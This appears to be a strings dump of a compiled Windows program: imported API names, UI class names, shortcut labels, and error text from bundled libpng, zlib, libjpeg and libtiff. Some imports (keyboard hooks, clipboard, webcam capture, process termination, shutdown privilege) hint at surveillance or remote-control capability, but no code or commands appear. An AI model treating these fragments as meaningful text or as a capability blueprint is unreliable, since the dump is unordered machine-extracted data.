english-south africa
english-nz
english-jamaica
english-ire
english-caribbean
english-can
english-belize
english-aus
english-american
dutch-belgian
chinese-traditional
chinese-singapore
chinese-simplified
chinese-hongkong
chinese
canadian
belgian
australian
american-english
american english
american
1#QNAN
1#INF
1#IND
1#SNAN
ios::eofbit set
ios::failbit set
ios::badbit set
string too long
invalid string position
iphlpapi.dll
SHLWAPI.dll
MPR.dll
midiStreamRestart
midiStreamClose
midiOutReset
midiStreamStop
midiStreamOut
midiOutPrepareHeader
midiStreamProperty
midiStreamOpen
midiOutUnprepareHeader
waveOutOpen
waveOutGetNumDevs
waveOutClose
waveOutReset
waveOutPause
waveOutWrite
waveOutPrepareHeader
waveOutUnprepareHeader
mciSendStringA
waveOutRestart
WINMM.dll
WS2_32.dll
VerLanguageNameA
VERSION.dll
RasGetConnectStatusA
RasHangUpA
RASAPI32.dll
CloseHandle
WaitForSingleObject
CreateProcessA
GetTickCount
GetCommandLineA
MulDiv
GetProcAddress
GetModuleHandleA
GetVolumeInformationA
SetCurrentDirectoryA
CreateDirectoryA
CopyFileA
DeleteFileA
MoveFileA
GetFileAttributesA
FindClose
FindFirstFileA
GetTempPathA
GlobalUnlock
GlobalLock
GlobalAlloc
ExpandEnvironmentStringsA
Sleep
CreateEventA
CreateThread
WritePrivateProfileStringA
GetVersionExA
GetLastError
LoadLibraryA
FreeLibrary
GetFullPathNameA
GetUserDefaultLCID
HeapAlloc
GetProcessHeap
HeapReAlloc
HeapFree
GlobalReAlloc
FindNextFileA
lstrcpyA
WinExec
lstrlenA
lstrcatA
InitializeCriticalSection
DeleteCriticalSection
GlobalFree
GlobalSize
ExitProcess
GetCurrentThreadId
GetModuleFileNameA
RemoveDirectoryA
lstrlenW
LockResource
LoadResource
FindResourceA
SetEvent
CreateFileA
WaitForMultipleObjects
ReadFile
WriteFile
GetProfileStringA
LeaveCriticalSection
EnterCriticalSection
ReleaseSemaphore
ResumeThread
CreateSemaphoreA
Process32Next
Process32First
CreateToolhelp32Snapshot
SetFilePointer
GetFileSize
GetCurrentProcess
TerminateProcess
OpenProcess
GetWindowsDirectoryA
GetSystemDirectoryA
MultiByteToWideChar
SetLastError
GetTimeZoneInformation
GetSystemDefaultLangID
GetLocaleInfoA
GetVersion
SetSystemPowerState
WideCharToMultiByte
GetTempFileNameA
FileTimeToSystemTime
IsDBCSLeadByte
lstrcmpA
lstrcmpiA
lstrcpynA
UnmapViewOfFile
MapViewOfFile
CreateFileMappingA
FlushViewOfFile
TerminateThread
CreateMutexA
ReleaseMutex
SuspendThread
KERNEL32.dll
WaitForInputIdle
wsprintfA
CloseClipboard
GetClipboardData
OpenClipboard
SetClipboardData
EmptyClipboard
GetSystemMetrics
GetCursorPos
MessageBoxA
MessageBeep
SetWindowPos
SendMessageA
DestroyCursor
SetParent
IsWindow
PostMessageA
GetTopWindow
GetParent
GetFocus
GetClientRect
InvalidateRect
ValidateRect
UpdateWindow
EqualRect
GetWindowRect
SetForegroundWindow
DestroyMenu
IsChild
ReleaseDC
IsRectEmpty
FillRect
GetDC
SetCursor
LoadCursorA
SetCursorPos
SetActiveWindow
GetSysColor
SetWindowLongA
GetWindowLongA
RedrawWindow
EnableWindow
IsWindowVisible
OffsetRect
PtInRect
DestroyIcon
IntersectRect
InflateRect
SetRect
SetScrollPos
SetScrollRange
GetScrollRange
SetCapture
GetCapture
ReleaseCapture
SetTimer
KillTimer
WinHelpA
LoadBitmapA
CopyRect
ChildWindowFromPointEx
ScreenToClient
GetMessagePos
SetWindowRgn
DestroyAcceleratorTable
GetWindow
GetActiveWindow
SetFocus
IsIconic
PeekMessageA
SetMenu
GetMenu
DeleteMenu
GetSystemMenu
DefWindowProcA
GetClassInfoA
IsZoomed
PostQuitMessage
CopyAcceleratorTableA
GetKeyState
TranslateAcceleratorA
IsWindowEnabled
ShowWindow
SystemParametersInfoA
LoadImageA
EnumDisplaySettingsA
ClientToScreen
EnableMenuItem
GetSubMenu
GetDlgCtrlID
CreateAcceleratorTableA
CreateMenu
ModifyMenuA
AppendMenuA
CreatePopupMenu
DrawIconEx
CreateIconFromResource
CreateIconFromResourceEx
RegisterClipboardFormatA
SetRectEmpty
DispatchMessageA
GetMessageA
WindowFromPoint
DrawFocusRect
DrawEdge
DrawFrameControl
TranslateMessage
LoadIconA
GetKeyboardLayout
GetDesktopWindow
GetClassNameA
GetWindowThreadProcessId
FindWindowA
GetDlgItem
GetWindowTextA
GetForegroundWindow
ExitWindowsEx
SetWindowTextA
DestroyWindow
CharUpperA
DrawTextA
SetWindowsHookExA
UnhookWindowsHookEx
EnumThreadWindows
GetWindowTextLengthA
EnumChildWindows
CallNextHookEx
CallWindowProcA
GetWindowDC
GetSysColorBrush
FrameRect
USER32.dll
GetDeviceCaps
GetTextExtentPoint32A
RoundRect
GetCurrentObject
DPtoLP
LPtoDP
Rectangle
Ellipse
CreateCompatibleDC
GetPixel
BitBlt
StartPage
StartDocA
DeleteDC
EndDoc
EndPage
GetObjectA
GetStockObject
CreateFontIndirectA
CreateSolidBrush
FillRgn
CreateRectRgn
CombineRgn
PatBlt
CreatePen
SelectObject
CreatePatternBrush
CreateBitmap
CreateHatchBrush
CreateBrushIndirect
CreateDCA
CreateCompatibleBitmap
GetPolyFillMode
GetStretchBltMode
GetROP2
GetBkColor
GetBkMode
GetTextColor
CreateRoundRectRgn
CreateEllipticRgn
PathToRegion
EndPath
BeginPath
GetWindowOrgEx
GetViewportOrgEx
GetWindowExtEx
GetDIBits
RealizePalette
SelectPalette
StretchBlt
CreatePalette
GetSystemPaletteEntries
CreateDIBitmap
DeleteObject
SelectClipRgn
CreatePolygonRgn
GetClipRgn
SetStretchBltMode
SetPixel
CreateRectRgnIndirect
SetBkColor
SetBkMode
LineTo
MoveToEx
SetTextColor
CreateEllipticRgnIndirect
GetTextMetricsA
GDI32.dll
GradientFill
MSIMG32.dll
ClosePrinter
DocumentPropertiesA
OpenPrinterA
WINSPOOL.DRV
RegCloseKey
RegQueryValueExA
RegOpenKeyExA
RegSetValueExA
RegCreateKeyA
RegQueryValueA
OpenProcessToken
GetUserNameA
RegCreateKeyExA
AdjustTokenPrivileges
LookupPrivilegeValueA
ADVAPI32.dll
ShellExecuteA
Shell_NotifyIconA
SHGetSpecialFolderPathA
SHELL32.dll
OleRun
CoCreateInstance
CLSIDFromString
OleUninitialize
OleInitialize
ole32.dll
OLEAUT32.dll
_TrackMouseEvent
ImageList_Destroy
COMCTL32.dll
oledlg.dll
WSOCK32.dll
InternetCloseHandle
InternetOpenA
InternetSetOptionA
InternetConnectA
InternetReadFile
HttpQueryInfoA
HttpSendRequestA
HttpOpenRequestA
InternetCrackUrlA
InternetCanonicalizeUrlA
WININET.dll
capCreateCaptureWindowA
capGetDriverDescriptionA
ICClose
ICOpen
ICCompressorFree
ICSeqCompressFrameEnd
ICSendMessage
ICSeqCompressFrameStart
DrawDibClose
DrawDibEnd
AVICAP32.dll
MSVFW32.dll
InterlockedIncrement
InterlockedDecrement
LocalFree
FormatMessageA
FileTimeToLocalFileTime
DuplicateHandle
FlushFileBuffers
LockFile
UnlockFile
SetEndOfFile
GetThreadLocale
GlobalDeleteAtom
GlobalFindAtomA
GlobalAddAtomA
GlobalGetAtomNameA
LocalAlloc
TlsAlloc
GlobalHandle
TlsFree
TlsSetValue
LocalReAlloc
TlsGetValue
GetFileTime
GetCurrentThread
GlobalFlags
SetErrorMode
GetProcessVersion
GetCPInfo
GetOEMCP
GetStartupInfoA
RtlUnwind
GetSystemTime
GetLocalTime
RaiseException
GetFileType
HeapSize
GetACP
SetStdHandle
UnhandledExceptionFilter
FreeEnvironmentStringsA
FreeEnvironmentStringsW
GetEnvironmentStrings
GetEnvironmentStringsW
SetHandleCount
GetStdHandle
GetEnvironmentVariableA
HeapDestroy
HeapCreate
VirtualFree
SetEnvironmentVariableA
LCMapStringA
LCMapStringW
VirtualAlloc
IsBadWritePtr
SetUnhandledExceptionFilter
GetStringTypeA
GetStringTypeW
GetCurrentProcessId
CompareStringA
CompareStringW
IsBadReadPtr
IsBadCodePtr
IsValidLocale
IsValidCodePage
EnumSystemLocalesA
GetLocaleInfoW
InterlockedExchange
BeginPaint
EndPaint
TabbedTextOutA
GrayStringA
CreateDialogIndirectParamA
EndDialog
GetNextDlgTabItem
GetWindowPlacement
RegisterWindowMessageA
GetLastActivePopup
GetMessageTime
RemovePropA
GetPropA
SetPropA
GetClassLongA
CreateWindowExA
GetMenuItemID
GetMenuItemCount
RegisterClassA
GetScrollPos
AdjustWindowRectEx
MapWindowPoints
SendDlgItemMessageA
ScrollWindowEx
IsDialogMessageA
MoveWindow
CheckMenuItem
SetMenuItemBitmaps
GetMenuState
GetMenuCheckMarkDimensions
CharNextA
SetWindowContextHelpId
MapDialogRect
LoadStringA
GetNextDlgGroupItem
PostThreadMessageA
SaveDC
RestoreDC
SetPolyFillMode
SetROP2
SetMapMode
SetViewportOrgEx
OffsetViewportOrgEx
SetViewportExtEx
ScaleViewportExtEx
SetWindowOrgEx
SetWindowExtEx
ScaleWindowExtEx
GetClipBox
ExcludeClipRect
ExtSelectClipRgn
GetViewportExtEx
PtVisible
RectVisible
TextOutA
ExtTextOutA
Escape
GetMapMode
GetFileTitleA
GetSaveFileNameA
GetOpenFileNameA
ChooseColorA
comdlg32.dll
CLSIDFromProgID
CoTaskMemAlloc
CoTaskMemFree
CoGetClassObject
StgOpenStorageOnILockBytes
StgCreateDocfileOnILockBytes
CreateILockBytesOnHGlobal
CoFreeUnusedLibraries
CoRegisterMessageFilter
CoRevokeClassObject
OleFlushClipboard
OleIsCurrentClipboard
UnregisterClassA
.PAVCException@@
Software\
NewPlay
CreatePlayer
Shell32.dll
Mpr.dll
Advapi32.dll
User32.dll
Gdi32.dll
Kernel32.dll
.PAVCException@@
msctls_updown32
_EL_Label
_EL_PicBox
BUTTON
msctls_progress32
\shell\open\command
mailto:
_EL_Timer
_EL_DrawPanel
DISPLAY
_EL_ClientSock
OpenDatabase
CloseDatabase
GetConnectString
GetTabList
DllUnregisterServer
DllRegisterServer
DEFAULT_ICON
RemovePlayer
CWinFormUnit
.PAVCException@@
WTWindow
GetMonitorInfoA
MonitorFromWindow
User32.dll
%.13g
bcdfghijklmnpqrstuvwxyz
abcddefghijklmnoopqrrsstuvvwwxyyz;
(&07-034/)7 '
!"#!
?? / %d]
%d / %d]
.PAVCException@@
.PAVCFileException@@
: %d]
(*.*)|*.*||
(*.MID)|*.MID|
(*.*)|*.*||
Ctrl+Shift+F12
Ctrl+Shift+F11
Ctrl+Shift+F10
Ctrl+Shift+F9
Ctrl+Shift+F8
Ctrl+Shift+F7
Ctrl+Shift+F6
Ctrl+Shift+F5
Ctrl+Shift+F4
Ctrl+Shift+F3
Ctrl+Shift+F2
Ctrl+Shift+F1
Shift+F12
Shift+F11
Shift+F10
Shift+F9
Shift+F8
Shift+F7
Shift+F6
Shift+F5
Shift+F4
Shift+F3
Shift+F2
Shift+F1
Ctrl+F12
Ctrl+F11
Ctrl+F10
Ctrl+F9
Ctrl+F8
Ctrl+F7
Ctrl+F6
Ctrl+F5
Ctrl+F4
Ctrl+F3
Ctrl+F2
Ctrl+F1
Ctrl+Z
Ctrl+Y
Ctrl+X
Ctrl+W
Ctrl+V
Ctrl+U
Ctrl+T
Ctrl+S
Ctrl+R
Ctrl+Q
Ctrl+P
Ctrl+O
Ctrl+N
Ctrl+M
Ctrl+L
Ctrl+K
Ctrl+J
Ctrl+I
Ctrl+H
Ctrl+G
Ctrl+F
Ctrl+E
Ctrl+D
Ctrl+C
Ctrl+B
Ctrl+A
.PAVCException@@
.PAVCException@@
(*.*)|*.*||
%s:%d
.PAVCException@@
devices
windows
device
zheng
MGridCells
.PAVCException@@
.PAVCNotSupportedException@@
.PAVCFileException@@
.PAVCException@@
.PAVCFileException@@
.PAVCException@@
.PAVCFileException@@
CColourPicker
out.prn
(*.*)|*.*||
devices
windows
device
%d.%d
.PAVCException@@
_EL_HideOwner
.PAVCException@@
Potential overflow in png_zalloc()
but running with
Application built with libpng-
1.6.9
unexpected zlib return code
unexpected zlib return
unsupported zlib version
truncated
insufficient memory
damaged LZ stream
bad parameters to zlib
zlib IO error
missing LZ dictionary
unexpected end of LZ stream
gamma value out of range
duplicate
gamma value does not match sRGB
gamma value does not match libpng estimate
invalid chromaticities
internal error checking chromaticities
inconsistent chromaticities
invalid sRGB rendering intent
cHRM chunk does not match sRGB
duplicate sRGB information ignored
inconsistent rendering intents
profile '
invalid length
too short
tag count too large
unexpected ICC PCS encoding
unrecognized ICC profile class
unexpected NamedColor ICC profile class
invalid embedded Abstract ICC profile
unexpected DeviceLink ICC profile class
Gray color space not permitted on RGB PNG
RGB color space not permitted on grayscale PNG
invalid ICC profile color space
PCS illuminant is not D50
invalid signature
intent outside defined range
invalid rendering intent
length does not match profile
ICC profile tag outside profile
ICC profile tag start not a multiple of 4
out-of-date sRGB profile with no signature
known incorrect sRGB profile
copyright violation: edited ICC profile ignored
internal error handling cHRM->XYZ
internal error handling cHRM coefficients
Invalid IHDR data
Invalid filter method in IHDR
Unknown filter method in IHDR
MNG features are not allowed in a PNG datastream
Unknown compression method in IHDR
Unknown interlace method in IHDR
Invalid color type/bit depth combination in IHDR
Invalid color type in IHDR
Invalid bit depth in IHDR
Invalid image height in IHDR
Invalid image width in IHDR
Image height exceeds user limit in IHDR
Image width exceeds user limit in IHDR
Image height is zero in IHDR
Image width is zero in IHDR
gamma table being rebuilt
Too many IDATs found
Missing PLTE before IDAT
Missing IHDR before IDAT
png_read_update_info/png_start_read_image: duplicate call
internal sequential row size calculation error
sequential row overflow
bad adaptive filter value
Invalid attempt to read row data
png_image_read: opaque pointer not NULL
png_image_read: out of memory
1.6.9
png_image_begin_read_from_memory: incorrect PNG_IMAGE_VERSION
png_image_begin_read_from_memory: invalid argument
invalid memory read
read beyond end of data
png_image_finish_read: damaged PNG_IMAGE_VERSION
png_image_finish_read: invalid argument
png_image_finish_read[color-map]: no color-map
bad background index (internal error)
bad processing option (internal error)
color map overflow (BAD internal error)
bad data option (internal error)
invalid PNG color type
palette color-map: too few entries
rgb-alpha color-map: too few entries
rgb+alpha color-map: too few entries
rgb color-map: too few entries
rgb[gray] color-map: too few entries
rgb[ga] color-map: too few entries
gray-alpha color-map: too few entries
ga-alpha color-map: too few entries
gray+alpha color-map: too few entries
gray[16] color-map: too few entries
gray[8] color-map: too few entries
a background color must be supplied to remove alpha/transparency
unexpected encoding (internal error)
bad encoding (internal error)
color-map index out of range
bad color-map processing (internal error)
unknown interlace type
png_read_image: invalid transformations
unexpected alpha swap transformation
png_image_read: alpha channel lost
png_read_image: unsupported transformation
unexpected bit depth
unexpected 8-bit transformation
lost/gained channels
unexpected compose
lost rgb to gray
%d / %d
_EL_ColourPopup
Bogus message code %d
libpng error: %s
undefined
libpng warning: %s
bad longjmp:
internal error: array alloc
internal error: array realloc
Out of memory
1.1.3
need dictionary
incorrect data check
incorrect header check
invalid window size
unknown compression method
Call to NULL read function
Read Error
Can't set both read_data_fn and write_data_fn in the same structure
PNG unsigned integer out of range
PNG file corrupted by ASCII conversion
Not a PNG file
CRC error
invalid
out of place
bKGD must be after
hIST must be after
tRNS must be after
duplicate
ignored in grayscale PNG
missing IHDR
PNG fixed point integer out of range
invalid values
too many profiles
bad keyword
bad compression method
truncated
out of memory
extra compressed data
too short
insufficient memory to read chunk
1.1.3
using zstream
zstream unclaimed
sPLT chunk requires too much memory
sPLT chunk too long
sPLT chunk has bad length
malformed sPLT chunk
No space in chunk cache for sPLT
invalid with alpha channel
invalid index
invalid data
unrecognized equation type
invalid parameter count
bad width format
bad height format
non-positive height
non-positive width
invalid unit
Insufficient memory to process text chunk
no space in chunk cache
insufficient memory
unknown compression type
bad compression info
unhandled critical chunk
forcing save of an unhandled chunk; please call png_set_keep_unknown_chunks
Saving unknown chunk:
error in user chunk
unknown chunk exceeds memory limits
invalid chunk type
invalid user transform pixel depth
internal row width error
internal row size calculation error
internal row logic error
Too much image data
Extra compressed data
Not enough image data
Row has too many bytes to allocate in memory
Application must supply a known background gamma
invalid before the PNG header has been read
invalid after png_start_read_image or png_read_update_info
conflicting calls to set alpha mode and background
invalid alpha mode
output gamma out of expected range
ignoring out of range rgb_to_gray coefficients
invalid error action to rgb_to_gray
invalid background gamma type
libpng does not support gamma+background+rgb_to_gray
Palette is NULL in indexed image
png_do_quantize returned rowbytes=0
png_do_rgb_to_gray found nongray pixel
Uninitialized row
NULL row buffer
png_do_encode_alpha: unexpected call
png_set_filler is invalid for low bit depth gray output
png_set_filler: inappropriate color type
Invalid palette size, hIST allocation skipped
Insufficient memory for hIST chunk data
Insufficient memory for pCAL parameter
Insufficient memory for pCAL params
Insufficient memory for pCAL units
Insufficient memory for pCAL purpose
Invalid format for pCAL parameter
Invalid pCAL parameter count
Invalid pCAL equation type
Memory allocation failed while processing sCAL
Invalid sCAL height
Invalid sCAL width
Invalid sCAL unit
Invalid palette
Invalid palette length
text chunk: out of memory
text compression mode is out of range
too many text chunks
Ignoring invalid time value
tRNS chunk has out-of-range samples for bit_depth
sPLT out of memory
png_set_sPLT: invalid sPLT
too many sPLT chunks
unknown chunk: out of memory
too many unknown chunks
invalid location in png_set_unknown_chunks
png_set_unknown_chunks now expects a valid location
png_set_keep_unknown_chunks: invalid keep
png_set_keep_unknown_chunks: too many chunks
png_set_keep_unknown_chunks: no chunk list
(%d-%d):
%ld%c
JPEGMEM
invalid bit length repeat
too many length or distance symbols
invalid stored block lengths
invalid block type
incompatible version
buffer error
insufficient memory
data error
stream error
file error
stream end
need dictionary
1.1.3
invalid distance code
invalid literal/length code
incomplete dynamic bit lengths tree
oversubscribed dynamic bit lengths tree
incomplete literal/length tree
oversubscribed literal/length tree
empty distance tree with lengths
incomplete distance tree
oversubscribed distance tree
invalid literal/length code
invalid distance code
Set cdaudio door closed wait
Set cdaudio door open wait
Shell_TrayWnd
Progman
unknown
Failed in call to GetOSVersion
Service Pack %d
Unknown OS
BackOffice Small Business Edition
Windows 2003
Terminal Services
Personal
Windows XP
Advanced Server
Domain Controller
Professional
Windows 2000
Enterprise
Datacenter
Backup Domain Controller
Primary Domain Controller
Server
Workstation
Windows NT
Windows ??
Windows Millenium Edition
Windows 98 Second Edition
Windows 98 SP1
Windows 98
Windows 95 OSR2
Windows 95 SP1
Windows 95
Windows CE
Windows
Microsoft Win32s
Microsoft Windows Me
Microsoft Windows 98
OSR2
Microsoft Windows 95
version
(Build
Windows Server 2008 R2
Windows 7
Windows Server 2008
Windows Vista
Microsoft Windows 2003
Microsoft Windows XP
Microsoft Windows 2000
Microsoft Windows NT
.?AVexception@@
.?AVbad_cast@std@@
missing locale facet
false
.?AVexception@@
.?AVbad_cast@std@@
GetVersionExA
KERNEL32.DLL
LANMANNT
SERVERNT
LANSECNT
Terminal Server
WinNT
Enterprise
Center
LanmanNT
Personal
SeShutdownPrivilege
PreviewInDesignMode
Caption
StatusText
(*.htm;*.html)|*.htm;*.html
Silent
Offline
FontSize
MousePointer
disable
visible
height
width
LLLLLK
.PAVCException@@
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
.PAVCException@@
HTTP/1.0
gb2312
us-ascii
=?gb2312?B?
ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/
%s <%s>
Content-type: text/plain; charset="
%a, %d %b %Y %H:%M:%S
%+.2d%.2d
.PAVCException@@
CSWCLASS
CSWCLASS
CSWCLASS
1.0.6
reading png image error
CSWCLASS
wsi10
CSWCLASS
ISeeExplorer
\shell32.dll
1.1.3
1.1.3
1.1.3
1.1.3
need dictionary
incorrect data check
incorrect header check
invalid window size
unknown compression method
incompatible version
buffer error
insufficient memory
data error
stream error
file error
stream end
need dictionary
invalid bit length repeat
too many length or distance symbols
invalid stored block lengths
invalid block type
invalid distance code
invalid literal/length code
incomplete dynamic bit lengths tree
oversubscribed dynamic bit lengths tree
incomplete literal/length tree
oversubscribed literal/length tree
empty distance tree with lengths
incomplete distance tree
oversubscribed distance tree
invalid literal/length code
invalid distance code
.PAVCException@@
msctls_trackbar32
msctls_progress32
SysTabControl32
SysMonthCal32
ScrollBar
msctls_updown32
SysDateTimePick32
ComboBox
SysTreeView32
SysListView32
ListBox
SysIPAddress32
msctls_hotkey32
Button
ComboLBox
yiyuyan
SetPauseState
RemovePlayer
CreatePlayer
GetPlayState
NewPlay
Application transferred too many scanlines
Invalid SOS parameters for sequential JPEG
Corrupt JPEG data: found marker 0x%02x instead of RST%d
Premature end of JPEG file
Warning: unknown JFIF revision number %d.%02d
Corrupt JPEG data: bad Huffman code
Corrupt JPEG data: premature end of data segment
Corrupt JPEG data: %u extraneous bytes before marker 0x%02x
Inconsistent progression sequence for component %d coefficient %d
Corrupt JPEG data: bad arithmetic code
Unknown Adobe color transform code %d
Obtained XMS handle %u
Freed XMS handle %u
Unrecognized component IDs %d %d %d, assuming YCbCr
JFIF extension marker: RGB thumbnail image, length %u
JFIF extension marker: palette thumbnail image, length %u
JFIF extension marker: JPEG-compressed thumbnail image, length %u
Opened temporary file %s
Closed temporary file %s
Ss=%d, Se=%d, Ah=%d, Al=%d
Component %d: dc=%d ac=%d
Start Of Scan: %d components
Start of Image
Component %d: %dhx%dv q=%d
Start Of Frame 0x%02x: width=%u, height=%u, components=%d
Smoothing not supported with nonstandard sampling ratios
RST%d
At marker 0x%02x, recovery action %d
Selected %d colors for quantization
Quantizing to %d colors
Quantizing to %d = %d*%d*%d colors
%4u %4u %4u %4u %4u %4u %4u %4u
Unexpected marker 0x%02x
Miscellaneous marker 0x%02x, length %u
with %d x %d thumbnail image
JFIF extension marker: type 0x%02x, length %u
Warning: thumbnail image size does not match data length %u
JFIF APP0 marker: version %d.%02d, density %dx%d %d
%3d %3d %3d %3d %3d %3d %3d %3d
End Of Image
Obtained EMS handle %u
Freed EMS handle %u
Define Restart Interval %u
Define Quantization Table %d precision %d
Define Huffman Table 0x%02x
Define Arithmetic Table 0x%02x: 0x%02x
Unknown APP14 marker (not Adobe), length %u
Unknown APP0 marker (not JFIF), length %u
Adobe APP14 marker: version %d, flags 0x%04x 0x%04x, transform %d
Caution: quantization tables are too coarse for baseline JPEG
7 27-Jun-2009
Copyright (C) 2009, Thomas G. Lane, Guido Vollbeding
Write to XMS failed
Read from XMS failed
Image too wide for this implementation
Virtual array controller messed up
Unsupported marker type 0x%02x
Application transferred too few scanlines
Write failed on temporary file --- out of disk space?
Seek failed on temporary file
Read failed on temporary file
Failed to create temporary file %s
Invalid JPEG file structure: SOS before SOF
Invalid JPEG file structure: two SOI markers
Unsupported JPEG process: SOF type 0x%02x
Invalid JPEG file structure: missing SOS marker
Invalid JPEG file structure: two SOF markers
Cannot quantize to more than %d colors
Cannot quantize to fewer than %d colors
Cannot quantize more than %d color components
Insufficient memory (case %d)
Not a JPEG file: starts with 0x%02x 0x%02x
Quantization table 0x%02x was not defined
JPEG datastream contains no image
Huffman table 0x%02x was not defined
Backing store not supported
Arithmetic table 0x%02x was not defined
Requested feature was omitted at compile time
Not implemented yet
Invalid color quantization mode change
Scan script does not transmit all data
Cannot transcode due to multiple use of quantization table %d
Premature end of input file
Empty input file
Maximum supported image dimension is %u pixels
Missing Huffman code table entry
Huffman code size table overflow
Fractional sampling not implemented yet
Output file write error --- out of disk space?
Input file read error
Didn't expect more than one scan
Write to EMS failed
Read from EMS failed
Empty JPEG image (DNL not supported)
Bogus DQT index %d
Bogus DHT index %d
Bogus DAC value 0x%x
Bogus DAC index %d
Unsupported color conversion request
Too many color components: %d, max %d
CCIR601 sampling not implemented yet
Suspension not allowed here
Buffer passed to JPEG library is too small
Bogus virtual array access
JPEG parameter struct mismatch: library thinks size is %u, caller expects %u
Improper call to JPEG library in state %d
Invalid scan script at entry %d
Bogus sampling factors
Invalid progressive parameters at scan script entry %d
Invalid progressive parameters Ss=%d Se=%d Ah=%d Al=%d
Unsupported JPEG data precision %d
Invalid memory pool code %d
Sampling factors too large for interleaved scan
Wrong JPEG library version: library is %d, caller expects %d
Bogus marker length
Bogus JPEG colorspace
Bogus input colorspace
Bogus Huffman table definition
Component index %d: mismatching sampling ratio %d:%d, %d:%d, %c
DCT scaled block size %dx%d not supported
DCT coefficient out of range
Invalid crop request
Invalid component ID %d in SOS
Bogus buffer control mode
MAX_ALLOC_CHUNK is wrong, please fix
ALIGN_TYPE is wrong, please fix
Bogus message code %d
%ld%c
JPEGMEM
Incompatible libpng version in application and library
Unknown zlib error
zlib version error
zlib memory error
1.1.3
Missing PLTE before IDAT
Missing IHDR before IDAT
PNG file corrupted by ASCII conversion
Not a PNG file
Extra compressed data
Decompression error
Not enough image data
Invalid attempt to read row data
Too many IDAT's found
Width too large to process image data; rowbytes will overflow.
1.0.6
png_do_dither returned rowbytes=0
png_do_rgb_to_gray found nongray pixel
NULL row buffer for row %ld, pass %d
Width too large for libpng to process image data.
Call to NULL read function
same structure. Resetting write_data_fn to NULL.
It's an error to set both read_data_fn and write_data_fn in the
Read Error
Unrecognized equation type for pCAL chunk
Out of Memory
need dictionary
incorrect data check
incorrect header check
invalid window size
unknown compression method
Error decoding compressed text
CRC error
Unknown zTXt compression type %d
Unknown filter method in IHDR
Unknown compression method in IHDR
Unknown interlace method in IHDR
Invalid color type/bit depth combination in IHDR
Invalid color type in IHDR
Invalid bit depth in IHDR
Invalid image size in IHDR
Invalid IHDR chunk
Out of place IHDR
Truncating incorrect tRNS chunk length
Invalid palette chunk
Duplicate PLTE chunk
Invalid PLTE after IDAT
Missing IHDR before PLTE
Incorrect IEND chunk length
No image in file
Ignoring incorrect gAMA value when sRGB is also present
Duplicate gAMA chunk
Out of place gAMA chunk
Invalid gAMA after IDAT
Incorrect gAMA chunk length
Missing IHDR before gAMA
Duplicate sBIT chunk
Out of place sBIT chunk
Invalid sBIT after IDAT
Incorrect sBIT chunk length
Missing IHDR before sBIT
Invalid cHRM white point
Invalid cHRM red point
Invalid cHRM green point
Invalid cHRM blue point
Ignoring incorrect cHRM value when sRGB is also present
Duplicate cHRM chunk
Missing PLTE before cHRM
Invalid cHRM after IDAT
Incorrect cHRM chunk length
Missing IHDR before cHRM
Unknown sRGB intent
Duplicate sRGB chunk
Out of place sRGB chunk
Invalid sRGB after IDAT
Incorrect sRGB chunk length
Missing IHDR before sRGB
malformed iCCP chunk
Duplicate iCCP chunk
Out of place iCCP chunk
Invalid iCCP after IDAT
Missing IHDR before iCCP
sPLT chunk has bad length
malformed sPLT chunk
Invalid sPLT after IDAT
Missing IHDR before sPLT
tRNS chunk not allowed with alpha channel
Zero length tRNS chunk
Incorrect tRNS chunk length
Duplicate tRNS chunk
Invalid tRNS after IDAT
Missing PLTE before tRNS
Missing IHDR before tRNS
Incorrect bKGD chunk index value
Incorrect bKGD chunk length
Duplicate bKGD chunk
Missing PLTE before bKGD
Invalid bKGD after IDAT
Missing IHDR before bKGD
Duplicate hIST chunk
Missing PLTE before hIST
Invalid hIST after IDAT
Incorrect hIST chunk length
Missing IHDR before hIST
Duplicate pHYS chunk
Invalid pHYS after IDAT
Incorrect pHYs chunk length
Missing IHDR before pHYS
Duplicate oFFs chunk
Invalid oFFs after IDAT
Incorrect oFFs chunk length
Missing IHDR before oFFs
Invalid pCAL parameters for equation type
Invalid pCAL data
Duplicate pCAL chunk
Invalid pCAL after IDAT
Missing IHDR before pCAL
Invalid sCAL data
malformed height string in sCAL chunk
malformed width string in sCAL chunk
Duplicate sCAL chunk
Invalid sCAL after IDAT
Missing IHDR before sCAL
Duplicate tIME chunk
Incorrect tIME chunk length
Out of place tIME chunk
Missing IHDR before tEXt
Zero length zTXt chunk
Missing IHDR before zTXt
Zero length iTXt chunk
Missing IHDR before iTXt
unknown critical chunk
invalid chunk type
Ignoring bad adaptive filter type
Extra compression data
Decompression Error
incompatible version
buffer error
insufficient memory
data error
stream error
file error
stream end
invalid bit length repeat
too many length or distance symbols
invalid stored block lengths
invalid block type
invalid distance code
invalid literal/length code
incomplete dynamic bit lengths tree
oversubscribed dynamic bit lengths tree
incomplete literal/length tree
oversubscribed literal/length tree
empty distance tree with lengths
incomplete distance tree
oversubscribed distance tree
%s: Cannot open
strip
%s: Write error at scanline %lu
%s: Seek error at scanline %lu
%u: Sample out of range, max %u
%s: Cannot modify tag "%s" while writing
TIFFSetField
%s: Unknown %stag %u
pseudo-
%f: Bad value for "%s"
%s: Invalid %stag "%s" (not supported by codec)
pseduo-
%ld: Bad value for "%s"
%d: Bad value for "%s"
Sorry, cannot nest SubIFDs
Nonstandard tile length %d, convert file
Nonstandard tile width %d, convert file
Bad value %ld for "%s" tag ignored
%s: Invalid InkNames value; expecting %d names, found %d
TIFFGetField
Error writing directory link
Sorry, can not handle images with %d-bit samples
Sorry, can not handle LogLuv images with %s=%d
Sorry, LogLuv data must have %s=%d or %d
Sorry, can not handle image with %s=%d
Sorry, LogL data must have %s=%d
Compression
Sorry, can not handle separated image with %s=%d
InkSet
Sorry, can not handle RGB image with %s=%d
Color channels
Sorry, can not handle YCbCr images with %s=%d
Planarconfiguration
Sorry, can not handle contiguous data with %s=%d, and %s=%d and Bits/Sample=%d
Samples/pixel
Missing needed %s tag
Sorry, requested compression method is not configured
Sorry, can not image with %d-bit samples
Out of memory for colormap copy
Missing required "Colormap" tag
No "put" routine setupl; probably can not handle image format
No "get" routine setup
No space for tile row buffer
No space for tile buffer
using top-left orientation
using bottom-left orientation
No space for strip buffer
No space for YCbCr->RGB conversion state
Assuming 8-bit colormap
No space for photometric conversion table
No space for B&W mapping table
No space for Palette mapping table
"%s": Bad mode
Can't open a compressed TIFF file with compression for update.
Not a TIFF file, bad version number %d (0x%x)
Not a TIFF file, bad magic number %d (0x%x)
Error writing TIFF header
